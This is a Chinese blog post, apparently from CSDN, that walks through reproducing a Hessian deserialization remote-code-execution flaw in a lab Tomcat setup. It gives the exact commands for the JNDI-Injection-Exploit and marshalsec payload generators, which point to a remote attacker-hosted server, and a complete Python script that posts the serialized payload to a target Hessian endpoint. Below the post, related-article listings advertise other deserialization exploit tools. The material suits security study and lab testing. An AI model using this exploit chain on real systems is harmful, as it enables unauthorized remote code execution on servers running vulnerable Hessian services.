Java Hessian反序列化漏洞

最新推荐文章于 2024-03-12 14:38:08 发布
最新推荐文章于 2024-03-12 14:38:08 发布
阅读量4.2k 收藏
点赞数 1
分类专栏: web安全 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36618918/article/details/128629795
版权

漏洞简介

Hessian是一个轻量级的remoting onhttp工具,是一个轻量级的Java序列化/反序列化框架,使用简单的方法提供了RMI的功能。 相比WebService,Hessian更简单、快捷。采用的是二进制RPC协议,因为采用的是二进制协议,所以它很适合于发送二进制数据。

和Java原生的序列化对比,Hessian更加高效并且非常适合二进制数据传输。既然是一个序列化/反序列化框架,Hessian同样存在反序列化漏洞的问题。
对于Hessian反序列化漏洞的利用,使用ysoserial工具的Gadget是无法成功的,而是要用marshalsec工具的Gadget。这是因为ysoserial是针对Java原生反序列化漏洞的,并没有一些如Hessian等非Java原生反序列化漏洞的Gadgets。

环境搭建

https://github.com/wlj-debug/Hessian-Deserialize-RCE
将HessianTest.war放到tomcat/webapp/目录下并启动tomcat
在这里插入图片描述
启动tomcat
在这里插入图片描述
访问:/HessianTest/hessian
在这里插入图片描述
漏洞搭建成功

漏洞复现

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A xx.xx.xx.xx

在这里插入图片描述
直接用marshalsec来生成payload,这里地址指定为JettyServer并在指定恶意执行类为ExecTemplateJDK7:
执行命令:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Resin http://xxx.xxx.xxx.xxx:8180/ ExecTemplateJDK7>hession

在这里插入图片描述
接下来就是编写脚本将序列化的payload:hession发送到服务器

#!/usr/bin/env python
# coding=utf-8
# code by 21superman
# Date 2018年12月28日
import requests
import argparse


def load(name):
    header=b'\x63\x02\x00\x48\x00\x04'+b'test'
    with open(name,'rb') as f:
        return header+f.read()

def send(url,payload):
    proxies = {'http':'127.0.0.1:8080'}
    headers={'Content-Type':'x-application/hessian'}
    data=payload
    res=requests.post(url,headers=headers,data=data)
    return res.text

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("-u", help="hessian site url eg.http://127.0.0.1:8080/HessianTest/hessian")
    parser.add_argument("-p",help="payload file")
    args = parser.parse_args()
    if args.u==None or args.p==None:
        print('eg. python hessian.py -u http://127.0.0.1:8080/HessianTest/hessian -p hessian')
    else:
        send(args.u, load(args.p))
if __name__ == '__main__':
    main()
    #load('hession')

python3 hessian.py -u http://172.21.1.130:8080/HessianTest/hessian -p hession

在这里插入图片描述

keepb1ue
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Hessian 序列RCE漏洞复现
0xSec
12-29 2290
Hessian是二进制的web service协议,官方对Java、Flash/Flex、Python、C++、.NET C#等多种语言都进行了实现。Hessian和Axis、XFire都能实现web service方式的远程方法调用,区别是Hessian是二进制协议,Axis、XFire则是SOAP协议,所以从性能上说Hessian远优于后两者,并且HessianJAVA使用方法非常简单。它使用Java语言接口定义了远程对象,集合了序列/序列和RMI功能。Hessian是一个轻量级的RPC框架。
序列工具_Hessian序列RCE漏洞复现及分析
weixin_40003512的博客
12-02 1409
Hessian是一个轻量级的RPC框架。它基于HTTP协议传输,使用Hessian二进制序列,对于数据包比较大的情况比较友好。Hessian序列类似Java序列,可导致RCE,POC好像2017年就公开了,但是最新版本hessian-4.0.60.jar,经过测试也存在序列RCE问题。使用marshalsec项目工具(https://github.com/mbechler/...
dubbo-exp:Dubbo序列一键快速攻击测试工具,支持dubbo协议和http协议,支持hessian序列java原生序列
05-09
工具仅用于安全研究以及内部自查,禁止使用工具发起非法攻击,造成的后果使用者负责 Dubbo序列测试工具 使用帮助 usage: java -jar exp.jar [OPTION] -h --help 帮助信息 -l --list 输出所有gadget信息 -g --gadget gadget名称 -a --args gadget入参,多个参数使用多次该命令传入,例-a -a Calc -p --protocol [dubbo|http] 通讯协议名称,默认缺省dubbo -s --serialization [hessian|java] 序列类型,默认缺省hessian -t --target 目标,例:127.0.0.1:20880 -f --fas
浅谈Java序列hessian序列的差异
08-29
主要通过对二者简单的实现方式的对比,介绍了Java序列hessian序列的差异,具有一定参考价值,需要的朋友可以了解下。
【Web】浅浅地聊Hessian序列有诸多限制的原因
最新发布
uuzeray的博客
03-12 877
注意到很多 Java 原生序列利用链在 Hessian 中无法使用,甚至 ysoserial 中一些明明是 hashCode/equals/compareTo 触发的链子都不能直接拿来用。这是为什么呢?本文将以下面两个例子以点带面,浅提一下。Hessian不是原生序列,不能从传统序列角度带入思考。
PyHessian:PyHessian是一个Pytorch库,用于基于二阶的神经网络分析和训练
05-13
介绍 PyHessian是一个基于Hessian的神经网络模型分析的pytorch库。 该库允许计算以下指标: 顶级黑森州特征值 黑森矩阵的迹线 完整的Hessian特征值频谱密度(ESD) 有关更多详细信息,请参见: 。 出版清单 该项目得到了NSF的资助,我们有兴趣记录在PyHessian上或在PyHessian的帮助下撰写的相关出版物。 这将使我们能够继续开发该库,也将是有关二阶方法以及相关工作的一个很好的总结。 。 如果您有相关论文,请与我们联系,我们很高兴将其添加到列表中。 用法 从Pip安装 您可以从pip安装库 pip install pyhessian 从源安装 您也可以从源代码编译库 git clone https://github.com/amirgholami/PyHessian.git python setup.py install 在运行Hessian代码之
Hessian序列漏洞学习记录
include_voidmain的博客
10-13 835
Hessian序列漏洞学习记录
Javaweb安全——Hessian 序列
weixin_43610673的博客
02-03 1800
Hessian类似于RMI也是一种RPC(Remote Produce Call)的实现。基于HTTP协议,使用二进制消息进行客户端和服务器端交互。Hessian 自行定义了一套自己的储存和还原数据的机制。对 8 种基础数据类型、3 种递归类型、ref 引用以及 Hessian 2.0 中的内部引用映射进行了相关定义。这样的设计使得 Hassian 可以进行跨语言跨平台的调用。
Hessian 序列序列
字节跳动技术团队官方博客
08-05 4913
动手点关注干货不迷路????背景问题和思考:序列参数有枚举属性,序列端增加一个枚举,能否正常序列序列子类,它和父类有同名参数,序列时,同名参数能否能正常赋值?序列对象增加参数,序列类不增加参数,能否正常序列?用于序列传输的属性,用包装器比较好,还是基本类型比较好?为什么要使用序列序列程序在运行过程中,产生的数据,不能一直保存在内存中,需要暂...
Hessian 序列及XXL-JOB
zkaqlaoniao的博客
11-29 777
我们经常在CTF里见到Java序列的题,而如何从CTF过渡到实战中是一个坎儿,今天就说一次在实战中遇到的不出网Hessian序列问题。文章所有内容无敏感信息,均为本地环境,只做思路分享。
java序列漏洞挖掘
qq_45001989的博客
09-08 1128
java序列漏洞挖掘 1.漏洞触发场景 在java编写的web应用与web服务器间java通常会发送大量的序列对象例如以下场景:   1)HTTP请求中的参数,cookies以及Parameters。   2)RMI协议,被广泛使用的RMI协议完全基于序列   4)JMX 同样用于处理序列对象   5)自定义协议 用来接收与发送原始的java对象 漏洞挖掘   (1)确定序列输入点     首先应找出readObject方法调用,在找到之后进行下一步的注入操作。一般可以通过以下方法进行查找:
Java 序列漏洞原理
Venscor技术养成之路
10-27 2472
最近做白盒审计,涉及到了java序列代码执行漏洞。由于接触web较晚,所以之前并未研究过此漏洞,这次出于工作需要,特意花了一点时间研究下。一、漏洞怎么生产的如果一个应用接受序列数据,并且没有对序列的对象做限制,就可能导致代码执行。(使用了有安全缺陷的Apache Commons Collections jar包) public static void main(String[] a
hessian学习基础篇——序列序列
05-26
NULL 博文链接:https://qinghua0208.iteye.com/blog/493516
learnjavabug:Java安全相关的漏洞和技术demo,原生Java、Fastjson、Jackson、Hessian2、XML序列漏洞利用和Spring、Dubbo、Shiro、CAS、Tomcat、RMI、Nexus等框架\中间件\功能的exploits以及Java Security Manager绕过、Dubbo-Hessian2安全加固等等实践代码
05-01
这是一个个人用于复现、公开一些感兴趣、或者影响稍大的漏洞的项目,没有多少技术含量,权当个人技术笔记。 fastjson 该模块主要记录一些fastjson的利用gadget,不过很多gadget并没有记录在案。 RCE相关 package:...
Hessian 2.0序列协议规范.docx
09-14
Hessian 2.0序列协议规范》 在分布式计算和网络通信中,数据的序列序列是至关重要的环节。...在实际应用中,Hessian 2.0已被广泛应用于Java、C++、Python等多种语言环境下的分布式系统中。
S25-hessian序列1
08-03
【S25-Hessian序列1】是一个关于JavaHessian序列库的讨论,主要涉及Hessian与原生Java序列的差异以及在Spring框架中的应用。Hessian是一种二进制序列协议,旨在提高远程过程调用(RPC)的效率。与原生Java...
Java安全』序列-浅析Hessian序列POP链
Ho1aAs‘s Blog
07-22 1114
# 序列漏洞原理 在序列时,会通过标志位判断对象的类型,然后调用对应类的序列器 对应方法在`SerializerFactory.loadDeserializer()` 具体会**调用到Map的put方法**写入键值对 **对于Map类:会调用序列器的readMap方法进行序列操作**,默认序列出来的是HashMap类 而**HashMap的put方法就会调用键自身的hashCode方法来判断是否有重复**,进而就造成了漏洞风险,这里不再赘述 **对于TreeMap还有equals.
Python 使用hessian传输二进制数据
白杨
04-05 568
注意需要使用protocol.Binary来包装字节数组传输,否则会报错。
hessian序列漏洞
01-06
Hessian是一种基于Java的轻量级的远程调用协议,用于实现不同语言之间的通信。而Hessian序列漏洞是指在Hessian协议中,由于不充分的输入验证或者对用户输入数据的不完全信任,导致攻击者可以利用恶意构造的序列数据,执行远程代码。这种漏洞在实际应用中可能会导致严重的安全问题,例如远程命令执行、拒绝服务等。 Hessian序列漏洞的出现与序列序列机制有关。在Java中,对象可以被序列成字节流,然后通过网络传输到另一个系统或者磁盘中,之后再进行序列还原成原始对象。如果序列过程中未对字节流进行充分的验证,恶意用户可以构造特定的字节流,以实现执行恶意代码的目的。 为了防范Hessian序列漏洞,开发人员应该对用户输入进行完全的信任验证,采取严格的输入验证,禁止远程代码执行。另外,可以采用安全的序列序列机制,例如对序列的数据进行数字签名或者加密,以确保数据的完整性和安全性。 在应对Hessian序列漏洞时,开发团队应该及时更新相关的安全补丁,对可能存在漏洞的系统进行全面审查,修复潜在的安全问题,同时也应做好监控和日志记录工作,及时发现并应对可能的攻击行为。保护系统安全需要全员的努力,包括开发人员、安全专家和运维团队,共同为系统的安全稳定保驾护航。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值